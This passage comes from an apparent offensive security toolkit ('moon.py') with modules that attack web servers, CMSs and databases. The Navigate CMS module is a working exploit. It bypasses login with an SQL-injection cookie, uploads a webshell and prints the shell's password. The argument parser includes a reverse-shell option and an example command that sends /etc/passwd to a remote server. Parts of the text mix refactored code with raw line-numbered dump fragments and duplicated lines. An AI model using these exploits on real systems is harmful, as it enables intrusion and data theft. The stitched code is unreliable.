-P http://192.168.0.1:3128)", ) 1084 | parser.add_argument('--proxy-cred', "-L", help="Proxy authentication credentials (eg -L name:password)", metavar='LOGIN:PASS') 1085 | parser.add_argument('--jboss-login', "-J", help="JBoss login and password for exploit admin-console in JBoss 5 and JBoss 6 " 1086 | "(default: admin:admin)", metavar='LOGIN:PASS', default='admin:admin') 1087 | parser.add_argument('--timeout', help="Seconds to wait before timeout connection (default 3)", default=3, type=int) 1088 | 1089 | parser.add_argument('--cookies', help="Specify cookies for Struts 2 Exploit. Use this to test features that require authentication. " 1090 | "Format: \"NAME1=VALUE1; NAME2=VALUE2\" (eg. --cookie \"JSESSIONID=24517D9075136F202DCE20E9C89D424D\"" 1091 | , type=str, metavar='NAME=VALUE') 1092 | #parser.add_argument('--retries', help="Retries when the connection timeouts (default 3)", default=3, type=int) 1093 | 1094 | # advanced parameters --------------------------------------------------------------------------------------- 1095 | group_advanced.add_argument("--reverse-host", "-r", help="Remote host address and port for reverse shell when exploiting " 1096 | "Java Deserialization Vulnerabilities in application layer " 1097 | "(for now, working only against *nix systems)" 1098 | "(eg. 192.168.0.10:1331)", type=str, metavar='RHOST:RPORT') 1099 | group_advanced.add_argument("--cmd", "-x", 1100 | help="Send specific command to run on target (eg. curl -d @/etc/passwd http://your_server)" 1101 | , type=str, metavar='CMD') 1102 | group_advanced.add_argument("--dns", help="Specifies the dns query for use with \"dns\" Gadget", type=str, metavar='URL') 1103 | group_advanced.add_argument("--windows", "-w", help="Specifies that the commands are for rWINDOWS System$ (cmd.exe)", 1104 | action='store_true') 1105 | group_advanced.add_argument("--post-parameter", "-H", help="Specify the parameter to find and inject serialized objects into it." 1106 | " (egs. 
-H javax.faces.ViewState or -H oldFormData (<- Hi PayPal =X) or others)" 1107 | " (DEFAULT: javax.faces.ViewState)", 1108 | default='javax.faces.ViewState', metavar='PARAMETER') 1109 | group_advanced.add_argument("--show-payload", "-t", help="Print the generated payload.", 1110 | action='store_true') 1111 | group_advanced.add_argument("--gadget", help="Specify the type of Gadget to generate the payload automatically." 1112 | " (DEFAULT: commons-collections3.1 or groovy1 for JenKins)", 1113 | choices=['commons-collections3.1', 'commons-collections4.0', 'jdk7u21', 'jdk8u20', 'groovy1', 'dns'], 1114 | default='commons-collections3.1') 1115 | group_advanced.add_argument("--load-gadget", help="Provide your own gadget from file (a java serialized object in RAW mode)", 1116 | metavar='FILENAME') 1117 | group_advanced.add_argument("--force", "-F", 1118 | help="Force send java serialized gadgets to URL informed in -u parameter. This will " 1119 | "send the payload in multiple formats (eg. RAW, GZIPED and BASE64) and with " 1120 | "different Content-Types.",action='store_true') 1121 | 1122 | # required parameters --------------------------------------------------------------------------------------- 1123 | group_standalone.add_argument("-host", "-u", help="Host address to be checked (eg. -u http://192.168.0.10:8080)", 1124 | type=str) 1125 | 1126 | # scan's mode parameters --------------------------------------------------------------------------------------- 1127 | group_auto_scan.add_argument("-network", help="Network to be checked in CIDR format (eg. 10.0.0.0/8)", 1128 | type=network_args, default='192.168.0.0/24') 1129 | group_auto_scan.add_argument("-ports", help="List of ports separated by commas to be checked for each host " 1130 | "(eg. 
# Manual-testing hook: ``__name__`` is never '__testing__' under normal
# execution or import, so this block is effectively disabled.
if __name__ == '__testing__':
    headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Connection": "keep-alive",
               "User-Agent": get_random_user_agent()}

    timeout = Timeout(connect=1.0, read=3.0)
    # cert_reqs='CERT_NONE' turns off TLS certificate verification for this pool.
    gl_http_pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE')
    _exploits.set_http_pool(gl_http_pool)


# ======== file: js_find/Main_js_find.py ========
# -*- coding: utf-8 -*-
import js_find.js_find

def exec(URL):
    """Entry point used by moon.py: run the JS-link crawler against *URL*."""
    run = js_find.js_find.attack
    run(URL)


# NOTE(review): exec() requires a URL, so running this file directly raises TypeError.
if __name__ == "__main__":
    exec()
# ======== file: js_find/__init__.py ========
# -*- coding: utf-8 -*-

# ======== file: js_find/js_find.py ========

# coding: utf-8
# The bulk of this file is adapted from https://threezh1.github.io/ By Threezh1

import requests, argparse, sys, re
from requests.packages import urllib3
from urllib.parse import urlparse
from bs4 import BeautifulSoup


def parse_args():
    """Parse the standalone CLI options.

    Not used when the module is driven through moon.py / attack(); kept for
    running the crawler on its own.

    :return: the argparse namespace (url, file, outputurl, outputsubdomain, js, deep)
    """
    example = '\tExample: \r\npython ' + sys.argv[0] + " -u http://www.baidu.com"
    cli = argparse.ArgumentParser(epilog=example)
    options = [
        (("-u", "--url"), {"help": "The website"}),
        (("-f", "--file"), {"help": "The file contains url or js"}),
        (("-ou", "--outputurl"), {"help": "Output file name. "}),
        (("-os", "--outputsubdomain"), {"help": "Output file name. "}),
        (("-j", "--js"), {"help": "Find in js file", "action": "store_true"}),
        (("-d", "--deep"), {"help": "Deep find", "action": "store_true"}),
    ]
    for flags, kwargs in options:
        cli.add_argument(*flags, **kwargs)
    return cli.parse_args()
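# Regular expression comes from https://github.com/GerbenJavado/LinkFinder
# Compiled once at import time; extract_URL() runs it per script body.
_URL_PATTERN = re.compile(r"""
  (?:"|')                               # Start newline delimiter
  (
    ((?:[a-zA-Z]{1,10}://|//)           # Match a scheme [a-Z]*1-10 or //
    [^"'/]{1,}\.                        # Match a domainname (any character + dot)
    [a-zA-Z]{2,}[^"']{0,})              # The domainextension and/or path
    |
    ((?:/|\.\./|\./)                    # Start with /,../,./
    [^"'><,;| *()(%%$^/\\\[\]]          # Next character can't be...
    [^"'><,;|()]{1,})                   # Rest of the characters can't be
    |
    ([a-zA-Z0-9_\-/]{1,}/               # Relative endpoint with /
    [a-zA-Z0-9_\-/]{1,}                 # Resource name
    \.(?:[a-zA-Z]{1,4}|action)          # Rest + extension (length 1-4 or action)
    (?:[\?|/][^"|']{0,}|))              # ? mark with parameters
    |
    ([a-zA-Z0-9_\-]{1,}                 # filename
    \.(?:php|asp|aspx|jsp|json|
         action|html|js|txt|xml)        # . + extension
    (?:\?[^"|']{0,}|))                  # ? mark with parameters
  )
  (?:"|')                               # End newline delimiter
""", re.VERBOSE)


def extract_URL(JS):
    """Return every quoted URL-like string found in *JS*, in order of appearance.

    :param JS: script text; any value is accepted and passed through ``str()``
        (so ``None`` yields ``[]``, never an error)
    :return: list of matches with the surrounding quotes stripped; duplicates
        are kept (the original dedup list was never filled, so this matches it)
    """
    # The former ``if result == None`` guard was dead: finditer() never returns None.
    return [match.group().strip('"').strip("'")
            for match in _URL_PATTERN.finditer(str(JS))]


# Get the page source
def Extract_html(URL):
    """Fetch *URL* and return its body decoded as UTF-8, or ``None`` on any request error.

    Certificate verification is disabled (``verify=False``), so the content of
    an HTTPS page is not authenticated; undecodable bytes are dropped.
    """
    header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36"}
    try:
        raw = requests.get(URL, headers=header, timeout=3, verify=False)
    except requests.RequestException:
        # Narrowed from a bare except: connection/timeout/bad-URL errors still
        # map to None, but KeyboardInterrupt now propagates.
        return None
    return raw.content.decode("utf-8", "ignore")


# Handling relative URLs
def process_url(URL, re_URL):
    """Resolve the link *re_URL* found on page *URL* to an absolute URL.

    Rules, in order: protocol-relative (``//host``) gets the page's scheme;
    anything starting with ``http`` is returned unchanged; a ``javascript:``
    link returns the page URL itself; ``/path`` is joined to the page origin;
    a leading ``..`` or ``.`` is stripped and the rest joined to the origin;
    everything else is joined to the origin with a ``/`` in between.

    :param URL: the page the link was found on
    :param re_URL: the raw link text
    :return: the resolved URL string
    """
    black_url = ["javascript:"]  # Add some keyword for filter url.
    URL_raw = urlparse(URL)
    origin = URL_raw.scheme + "://" + URL_raw.netloc
    if re_URL.startswith("//"):
        return URL_raw.scheme + ":" + re_URL
    if re_URL.startswith("http"):
        return re_URL
    if re_URL in black_url:
        return URL
    if re_URL.startswith("/"):
        return origin + re_URL
    if re_URL.startswith(".."):
        # Only the leading dots are removed; no real path normalisation is done.
        return origin + re_URL[2:]
    if re_URL.startswith("."):
        return origin + re_URL[1:]
    return origin + "/" + re_URL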
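def find_last(string, str):
    """Return every index at which *str* occurs in *string*, overlapping matches included.

    :param string: text to search
    :param str: substring to look for (parameter name kept for callers; it shadows the builtin)
    :return: list of start offsets in ascending order, ``[]`` when absent
    """
    positions = []
    start = 0
    while True:
        position = string.find(str, start)
        if position == -1:
            return positions
        positions.append(position)
        # Advance by one, not by len(str), so overlapping occurrences are reported.
        start = position + 1


def find_by_url(url, js=False):
    """Collect the links referenced by the scripts of page *url*.

    With ``js`` false the page is fetched, every inline ``<script>`` body is
    pooled under the page URL, every external ``src`` is fetched separately,
    and links found in all of them are resolved against the script they came
    from. Only links whose host contains the page's last two domain labels, or
    that have no host at all, are kept (first occurrence wins).
    With ``js`` true *url* is treated as a script itself and the sorted,
    de-duplicated link set is returned.

    :return: list of URLs, or ``None`` when the page could not be fetched
        (the js branch also returns ``None`` for an empty result)
    """
    if js:
        return sorted(set(extract_URL(Extract_html(url)))) or None

    html_raw = Extract_html(url)
    if html_raw is None:
        print("Fail to access " + url)
        return None
    html = BeautifulSoup(html_raw, "html.parser")
    script_array = {}
    script_temp = ""
    for html_script in html.findAll("script"):
        script_src = html_script.get("src")
        if script_src is None:
            script_temp += html_script.get_text() + "\n"
        else:
            purl = process_url(url, script_src)
            # May be None on fetch failure; extract_URL() tolerates that.
            script_array[purl] = Extract_html(purl)
    script_array[url] = script_temp

    allurls = []
    for script, body in script_array.items():
        for temp_url in extract_URL(body):
            allurls.append(process_url(script, temp_url))

    # Scope filter, computed once instead of per link as before. "Main domain"
    # is the text after the second-to-last dot (e.g. www.example.com -> example.com);
    # the check is a plain substring test, so it also accepts hosts that merely
    # end with the same text.
    domain = urlparse(url).netloc
    positions = find_last(domain, ".")
    main_domain = domain[positions[-2] + 1:] if len(positions) > 1 else domain
    result = []
    for singerurl in allurls:
        subdomain = urlparse(singerurl).netloc
        if main_domain in subdomain or subdomain.strip() == "":
            if singerurl.strip() not in result:
                result.append(singerurl)
    return result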
domain[positions[-2] + 1:] 135 | suburl = urlparse(singerurl) 136 | subdomain = suburl.netloc 137 | if miandomain in subdomain or subdomain.strip() == "": 138 | if singerurl.strip() not in result: 139 | result.append(singerurl) 140 | return result 141 | return sorted(set(extract_URL(Extract_html(url)))) or None 142 | 143 | 144 | def find_subdomain(urls, mainurl): 145 | url_raw = urlparse(mainurl) 146 | domain = url_raw.netloc 147 | miandomain = domain 148 | positions = find_last(domain, ".") 149 | if len(positions) > 1:miandomain = domain[positions[-2] + 1:] 150 | subdomains = [] 151 | for url in urls: 152 | suburl = urlparse(url) 153 | subdomain = suburl.netloc 154 | if subdomain.strip() == "": continue 155 | if miandomain in subdomain: 156 | if subdomain not in subdomains: 157 | subdomains.append(subdomain) 158 | return subdomains 159 | 160 | 161 | def find_by_url_deep(url): 162 | html_raw = Extract_html(url) 163 | if html_raw == None: 164 | print("Fail to access " + url) 165 | return None 166 | html = BeautifulSoup(html_raw, "html.parser") 167 | html_as = html.findAll("a") 168 | links = [] 169 | for html_a in html_as: 170 | src = html_a.get("href") 171 | if src == "" or src == None: continue 172 | link = process_url(url, src) 173 | if link not in links: 174 | links.append(link) 175 | if links == []: return None 176 | print("ALL Find " + str(len(links)) + " links") 177 | urls = [] 178 | i = len(links) 179 | for link in links: 180 | temp_urls = find_by_url(link) 181 | if temp_urls == None: continue 182 | print("Remaining " + str(i) + " | Find " + str(len(temp_urls)) + " URL in " + link) 183 | for temp_url in temp_urls: 184 | if temp_url not in urls: 185 | urls.append(temp_url) 186 | i -= 1 187 | return urls 188 | 189 | 190 | def find_by_file(file_path, js=False): 191 | with open(file_path, "r") as fobject: 192 | links = fobject.read().split("\n") 193 | if links == []: return None 194 | print("ALL Find " + str(len(links)) + " links") 195 | urls = [] 196 | i = 
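def giveresult(urls, domian):
    """Print status code and body length for each URL, then the in-scope hosts.

    :param urls: list of URLs to probe (a ``None`` here raises TypeError, which
        attack() reports as a failed crawl)
    :param domian: the start URL, passed to find_subdomain() as the scope reference
    """
    print("Find " + str(len(urls)) + " URL:")
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36', 'Connection': 'close'}
    for url in urls:
        try:
            # One request per URL; the original issued two (status and body
            # from separate GETs), doubling traffic and racing with itself.
            # verify=False: TLS certificates are not checked.
            resp = requests.get(url, headers=headers, timeout=60, verify=False)
            print('status_code:', ' ', str(resp.status_code), ' ', 'response_len:', str(len(resp.text)), ' ', url)
        except Exception as e:
            print(url, '页面访问错误:', f'Error2: {str(e)}')
    subdomains = find_subdomain(urls, domian)
    print("\nFind " + str(len(subdomains)) + " Subdomain:")
    for subdomain in subdomains:
        print(subdomain)


def attack(URL):
    """moon.py entry point: crawl *URL* for links in its scripts, then one level deeper.

    Silences urllib3's InsecureRequestWarning first (all fetches use
    ``verify=False``). Each phase prints a success or failure line; the deep
    crawl's result is computed but not printed.

    :param URL: start page
    """
    urllib3.disable_warnings()
    args_url = URL
    try:
        urls = find_by_url(args_url)
        giveresult(urls, args_url)
        print('[+]当前页面爬取完毕!')
    except Exception:
        print('[-]当前页面爬取失败!')
    try:
        urls = find_by_url_deep(args_url)
        print('[+]深度爬取成功!')
    except Exception:
        print('[-]深度爬取失败!')


# NOTE(review): attack() requires a URL, so running this file directly raises TypeError.
if __name__ == "__main__":
    attack()

# ======== file: kindeditor/Main_kindeditor.py ========
# -*- coding: utf-8 -*-
import os
import kindeditor.kindeditor_under_4_1_5_fileupload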
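def exec(URL):
    """Entry point used by moon.py: run the KindEditor upload-handler check against *URL*."""
    kindeditor.kindeditor_under_4_1_5_fileupload.attack(URL)


# NOTE(review): exec() requires a URL, so running this file directly raises TypeError.
if __name__ == "__main__":
    exec()

# ======== file: kindeditor/__init__.py ========
# -*- coding: utf-8 -*-

# ======== file: kindeditor/kindeditor_under_4_1_5_fileupload.py ========
# -*- coding: utf-8 -*-
import sys
import requests
import time

'''
Usage:
moon.py -u kindeditor http://127.0.0.1:8080/kidneditor
影响:kindeditor<=4.1.5 文件上传漏洞 可上传txt和html,用作钓鱼或者跳转博彩网站
检测方式:这里采用版本判断和查看上传文件的方式确认漏洞是否存在
首先查询编辑器版本,如果在4.1.5版本之下,且存在相应的上传文件,则认为漏洞存在
'''

# Upper bound for each probe; the original requests had no timeout and could hang.
REQUEST_TIMEOUT = 10


def attack(URL):
    """Report whether *URL* exposes the KindEditor <= 4.1.5 upload handlers.

    Read-only checks: GET ``/kindeditor-min.js`` and print its first 40 bytes
    (where the version banner sits), then GET each known ``upload_json``
    handler path and print which ones answer 200. Nothing is uploaded; a 200
    only shows the handler is present, not that it accepts files.

    :param URL: base URL of the KindEditor deployment, without a trailing slash
    """
    print('[+]开始检测-kindeditor<=4.1.5文件上传漏洞。[+]')
    user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
    headers = {"User-Agent": user_agent}

    # Version check
    try:
        url1 = URL + '/kindeditor-min.js'
        verify_response = requests.get(url1, headers=headers, timeout=REQUEST_TIMEOUT)
        print('开始检查kindeditor版本,kindeditor<=4.1.5存在文件上传漏洞:')
        if verify_response.status_code == 200:
            print('此kindeditor的版本为:', verify_response.content[:40])
        else:
            print('未发现获取版本的文件:', verify_response.status_code)
        print('-----------------------------------------------------')
    except Exception:
        # Was a bare except; Exception still covers request errors and
        # console encoding errors from print().
        print('获取版本失败。')

    # Check whether the upload handlers exist
    upload_paths = (
        '/asp/upload_json.asp',
        '/asp.net/upload_json.ashx',
        '/jsp/upload_json.jsp',
        '/php/upload_json.php'
    )
    for path in upload_paths:
        url = URL + path
        try:
            verify_response = requests.get(url, headers=headers, timeout=REQUEST_TIMEOUT)
        except Exception:
            print("Someerror!")
            continue
        if verify_response.status_code == 200:
            try:
                print('存在此页面:' + url + ' ' + str(verify_response.status_code))
            except Exception:
                # Kept from the original; presumably guards console encoding errors on Windows.
                pass
        else:
            print('未发现此页面:' + url + ' ' + str(verify_response.status_code))
    print('[+]检测结束-kindeditor<=4.1.5文件上传漏洞。[+]')
    print('\n')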
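# NOTE(review): running this file directly probes an empty base URL.
if __name__ == "__main__":
    attack('')


# ======== file: memcache_vuln/Main_memcache_vuln.py ========
# -*- coding: utf-8 -*-
import memcache_vuln.memcache_un


def exec(URL):
    """Entry point used by moon.py: run the memcached unauthenticated-access check against *URL*."""
    memcache_vuln.memcache_un.attack(URL)


# NOTE(review): exec() requires a URL, so running this file directly raises TypeError.
if __name__ == "__main__":
    exec()

# ======== file: memcache_vuln/__init__.py ========
# -*- coding: utf-8 -*-

# ======== file: memcache_vuln/memcache_un.py ========
# -*- coding: utf-8 -*-
import memcache


def attack(URL):
    """Check whether the memcached server named by *URL* answers ``stats`` without authentication.

    Only the text after the last ``/`` is used as the server address, so a
    value like ``http://host:11211`` reduces to ``host:11211``. The raw stats
    are printed; they expose version, uptime and memory figures of the host.

    :param URL: target, ``host:port`` optionally prefixed by a scheme
    """
    server = URL.split('/')[-1]
    try:
        print('[+]开始检测-memcache未授权访问漏洞。[+]')
        mc = memcache.Client([server], debug=True)
        print('[!]memcache获取信息结果:[!]')
        # NOTE(review): an unreachable server may yield an empty result here
        # rather than an exception - confirm before trusting the "found" path.
        print(mc.get_stats())
    except Exception:
        # Narrowed from a bare except so Ctrl-C still interrupts the scan.
        print('[-]未发现-发现-memcache未授权访问漏洞。[-]')
    print('[+]检测结束-memcache未授权访问漏洞。[+]')


# NOTE(review): attack() requires a URL, so running this file directly raises TypeError.
if __name__ == "__main__":
    attack()

# ======== file: moon.py ========
# -*- coding: utf-8 -*-
import sys
import tomcat.Main_tomcat
import fckeditor.Main_fckeditor
import weblogic.Main_weblogic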
import iis.Main_iis 7 | import docker_vuln.Main_docker 8 | import redis_vuln.Main_redis 9 | import zabbix_vuln.Main_zabbix 10 | import navigate_vuln.Main_navigate 11 | import gatepass_vuln.Main_gatepass 12 | import spring_vuln.Main_spring 13 | import jboss.Main_jboss 14 | import kindeditor.Main_kindeditor 15 | import durpal.Main_durpal 16 | import bf_dicts.Main_bf 17 | import thinkphp.Main_thinkphp 18 | import memcache_vuln.Main_memcache_vuln 19 | import js_find.Main_js_find 20 | import search_exploits.Main_search_exploits 21 | import activemq_vuln.Main_activemq 22 | 23 | 24 | if __name__ == "__main__": 25 | 26 | #使用说明 27 | if len(sys.argv) < 3 or sys.argv[1]=="-h": 28 | print(''' 29 | 漏洞检测: 30 | userage: python -u module http://xx.xx.xx.xx:xx 31 | modul: tomcat fck weblogic iis docker redis zabbix navigate gatepass kindeditor thinkphp memcache actviemq 32 | IP归属查询: 33 | userage: python -u module www.xxxxx.com/xx.xx.xx.xx 34 | modul:ip ipq 35 | Js中敏感信息收集: 36 | userage: python -u module http://xx.xx.xx.xx:xx 37 | modul:js 38 | 历史漏洞查询: 39 | modul: exploits 40 | ''') 41 | 42 | #漏洞利用 43 | elif sys.argv[1] == '-u': 44 | # 处理url末尾可能存在的/ 45 | if sys.argv[3][-1] != '/': 46 | pass 47 | else: 48 | sys.argv[3] = sys.argv[3][0:-1] 49 | print('[*]目标:'+sys.argv[3]) 50 | 51 | if sys.argv[2] == 'tomcat': 52 | tomcat.Main_tomcat.exec(sys.argv[3]) 53 | elif sys.argv[2] == 'fck': 54 | fckeditor.Main_fckeditor.exec(sys.argv[3]) 55 | elif sys.argv[2] == 'weblogic': 56 | weblogic.Main_weblogic.exec(sys.argv[3]) 57 | elif sys.argv[2] == 'iis': 58 | iis.Main_iis.exec(sys.argv[3]) 59 | elif sys.argv[2] == 'docker': 60 | docker_vuln.Main_docker.exec(sys.argv[3]) 61 | elif sys.argv[2] == 'redis': 62 | redis_vuln.Main_redis.exec(sys.argv[3]) 63 | elif sys.argv[2] == 'zabbix': 64 | zabbix_vuln.Main_zabbix.exec(sys.argv[3]) 65 | elif sys.argv[2] == 'navigate': 66 | navigate_vuln.Main_navigate.exec(sys.argv[3]) 67 | elif sys.argv[2] == 'gatepass': 68 | 
gatepass_vuln.Main_gatepass.exec(sys.argv[3]) 69 | elif sys.argv[2] == 'spring': 70 | spring_vuln.Main_spring.exec(sys.argv[3]) 71 | elif sys.argv[2] == 'jboss': 72 | jboss.Main_jboss.exec(sys.argv[3]) 73 | elif sys.argv[2] == 'kindeditor': 74 | kindeditor.Main_kindeditor.exec(sys.argv[3]) 75 | elif sys.argv[2] == 'drupal': 76 | durpal.Main_durpal.exec(sys.argv[3]) 77 | elif sys.argv[2] == 'thinkphp': 78 | thinkphp.Main_thinkphp.exec(sys.argv[3]) 79 | elif sys.argv[2] == 'memcache': 80 | memcache_vuln.Main_memcache_vuln.exec(sys.argv[3]) 81 | elif sys.argv[2] == 'js': 82 | js_find.Main_js_find.exec(sys.argv[3]) 83 | elif sys.argv[2] == 'exploits': 84 | search_exploits.Main_search_exploits.exec(sys.argv[3]) 85 | elif sys.argv[2] == 'activemq': 86 | activemq_vuln.Main_activemq.exec(sys.argv[3]) 87 | 88 | else: 89 | print(''' 90 | 漏洞检测: 91 | userage: python -u module http://xx.xx.xx.xx:xx 92 | modul: tomcat fck weblogic iis docker redis zabbix navigate gatepass kindeditor thinkphp memcache activemq 93 | IP归属查询: 94 | userage: python -u module www.xxxxx.com/xx.xx.xx.xx 95 | modul:ip ipq 96 | Js中敏感信息收集: 97 | userage: python -u module http://xx.xx.xx.xx:xx 98 | modul:js 99 | 历史漏洞查询: 100 | modul: exploits 101 | ''') 102 | elif sys.argv[1] == '-p': 103 | print('[+]检测地址:'+sys.argv[2]+sys.argv[3]+sys.argv[4]) 104 | bf_dicts.Main_bf.exec(sys.argv[2],sys.argv[3],sys.argv[4]) 105 | 106 | else: 107 | print(''' 108 | 漏洞检测: 109 | userage: python -u module http://xx.xx.xx.xx:xx 110 | modul: tomcat fck weblogic iis docker redis zabbix navigate gatepass kindeditor thinkphp memcache activemq 111 | IP归属查询: 112 | userage: python -u module www.xxxxx.com/xx.xx.xx.xx 113 | modul:ip ipq 114 | Js中敏感信息收集: 115 | userage: python -u module http://xx.xx.xx.xx:xx 116 | modul:js 117 | 历史漏洞查询: 118 | modul: exploits 119 | ''') 120 | -------------------------------------------------------------------------------- /navigate_vuln/88.php: 
-------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /navigate_vuln/Main_navigate.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import navigate_vuln.navigate_Unauthenticated_Remote_Code_Execution_CVE_2018_17553 3 | 4 | 5 | def exec(URL): 6 | navigate_vuln.navigate_Unauthenticated_Remote_Code_Execution_CVE_2018_17553.attack(URL) 7 | 8 | 9 | if __name__ == "__main__": 10 | exec() 11 | -------------------------------------------------------------------------------- /navigate_vuln/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /navigate_vuln/navigate_Unauthenticated_Remote_Code_Execution_CVE_2018_17553.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | from requests_toolbelt.multipart.encoder import MultipartEncoder 4 | import sys 5 | 6 | r''' 7 | Usage: 8 | moon.py -u navigate http://x.x.x.x:xx 9 | V2.8版本测试存在此漏洞。 10 | 参考 https://www.exploit-db.com/exploits/45561/ 11 | https://github.com/rapid7/metasploit-framework/pull/10704 12 | 上面msf的利用脚本会向该cms的/navigate/navigate_info.php文件写入shell,以下脚本也是利用的这个思路. 
13 | 因此如果/navigate/navigate_info.php文件不存在,会造成shell写入失败。 14 | Navigate CMS v2.8 测试成功 15 | 绕过登录限制 16 | cookie' => 'navigate-user=\" OR TRUE--%20' 17 | ''' 18 | 19 | 20 | def attack(URL): 21 | print('[+]开始检测-navigate_Unauthenticated_Remote_Code_Execution_CVE-2018-17553。[+]') 22 | user_agent="Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36" 23 | headers={"User-Agent":user_agent} 24 | try: 25 | urls = [URL + '/login.php',URL+'/navigate/login.php'] 26 | for url in urls: 27 | print('检测的URL为:'+url) 28 | cookies = {'navigate-user':r'\" OR TRUE--%20'} 29 | r = requests.get(url,headers=headers,cookies=cookies,verify=False,allow_redirects=False) 30 | if r.status_code == 302: 31 | print('[+]返回值为:'+str(r.status_code)+' 可能存在漏洞。') 32 | #print(r.cookies.items()[0][1])#获取session_id 33 | global Session_id 34 | Session_id = r.cookies.items()[0][1] 35 | else: 36 | print('[-]返回值为:' + str(r.status_code) + ' 不存在漏洞。') 37 | except: 38 | print('[-]未发现该漏洞。!') 39 | else: 40 | try: 41 | url = URL + '/navigate/navigate_info.php' 42 | r = requests.get(url) 43 | scode = r.status_code 44 | if scode == 200: 45 | print('[+]访问/navigate/navigate_info.php成功,开始写入。') 46 | try: 47 | pwd = sys.argv[0][:33] # 获取当前文件夹的路径 48 | url = URL + f'/navigate/navigate_upload.php?id=../../../navigate_info.php&session_id={Session_id}&engine=picnik' 49 | m = MultipartEncoder(fields={ 50 | 'Content-Disposition': 'form-data; name="file"; filename="tCc2QJ7PUxSC"', 51 | 'file': ('shellname', open(f'{pwd}\\navigate_vuln\\88.php', 'rb'), 'image/jpeg'), 52 | }) 53 | headers = { 54 | 'Content-Type': m.content_type, 55 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36', 56 | } 57 | r = requests.post(url, data=m, headers=headers) 58 | #print(r.status_code) #值为200上传正常 59 | print('一句话地址为:' + URL + '/navigate/navigate_info.php') 60 | print('密码为:' + 'tBjyWW3456tBjyWWtBjyWW87ttBjyWW') 61 | except: 62 | 
print('上传shell发生错误。') 63 | else: 64 | print('[-]访问/navigate/navigate_info.php失败,无法进行shell写入。') 65 | except: 66 | print('[-]访问/navigate/navigate_info.php发生错误。') 67 | 68 | print('[+]检测结束-navigate_Unauthenticated_Remote_Code_Execution_CVE-2018-17553。[+]') 69 | print('\n') 70 | 71 | 72 | if __name__ == '__main__': 73 | attack() 74 | -------------------------------------------------------------------------------- /redis_vuln/Main_redis.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import redis_vuln.redis_unauthorized 3 | 4 | 5 | def exec(URL): 6 | redis_vuln.redis_unauthorized.attack(URL) 7 | 8 | 9 | if __name__ == "__main__": 10 | exec() 11 | -------------------------------------------------------------------------------- /redis_vuln/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /redis_vuln/redis_unauthorized.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import redis 3 | import re 4 | 5 | ''' 6 | Usage: 7 | moon.py -u redis http://127.0.0.1:6379 8 | redis未授权访问漏洞 9 | ''' 10 | 11 | 12 | def attack(URL): 13 | print('[+]开始检测-Redis未授权访问漏洞。[+]') 14 | # print(re.findall('//(.*?):',URL)[0])#获取IP 15 | # print(re.findall(':(\w*?)$',URL)[0])#获取端口 16 | try: 17 | r = redis.StrictRedis(host=re.findall('//(.*?):',URL)[0], port=re.findall(':(\w*?)$',URL)[0], db=0) 18 | print('获取连接成功。客户列表为:'+str(r.client_list())) 19 | except IndexError: 20 | try: 21 | r = redis.StrictRedis(host=re.findall('(.*?):', URL)[0], port=re.findall(':(\w*?)$', URL)[0], db=0) 22 | print('获取连接成功。客户列表为:' + str(r.client_list())) 23 | except redis.exceptions.ResponseError: 24 | print('[-]访问受限:NOAUTH Authentication required') 25 | except redis.exceptions.ConnectionError: 26 | print('获取连接失败。') 27 | 28 | 
print('[+]检测结束-Redis未授权访问漏洞。[+]') 29 | 30 | 31 | if __name__ == "__main__": 32 | attack() 33 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | bs4 3 | requests_toolbelt 4 | docker 5 | redis 6 | python3-memcached 7 | lxml 8 | struct 9 | socket -------------------------------------------------------------------------------- /search_exploits/Main_search_exploits.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import search_exploits.search_exploit 3 | 4 | 5 | def exec(URL): 6 | search_exploits.search_exploit.attack(URL) 7 | 8 | 9 | if __name__ == "__main__": 10 | exec() 11 | -------------------------------------------------------------------------------- /search_exploits/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- -------------------------------------------------------------------------------- /search_exploits/search_exploit.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | 4 | 5 | def attack(URL): 6 | print(f'[+]开始在exploitalert中搜索 {URL} 存在的历史漏洞。') 7 | payload = {'name': URL} 8 | r = requests.get("https://www.exploitalert.com/api/search-exploit", params=payload) 9 | if r.text == '': 10 | print('未发现历史漏洞!') 11 | else: 12 | for json in r.json(): 13 | print(json) 14 | print(f'[+]在exploitalert中搜索 {URL} 存在的历史漏洞结束。') 15 | 16 | 17 | if __name__ == "__main__": 18 | attack() 19 | -------------------------------------------------------------------------------- /spring_vuln/CVE_2018_1273.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import requests 3 | import random 4 | 5 | ''' 6 | moon.py -u spring http://xxxx.xxxx.xxxx.xxxx:xx 7 | 
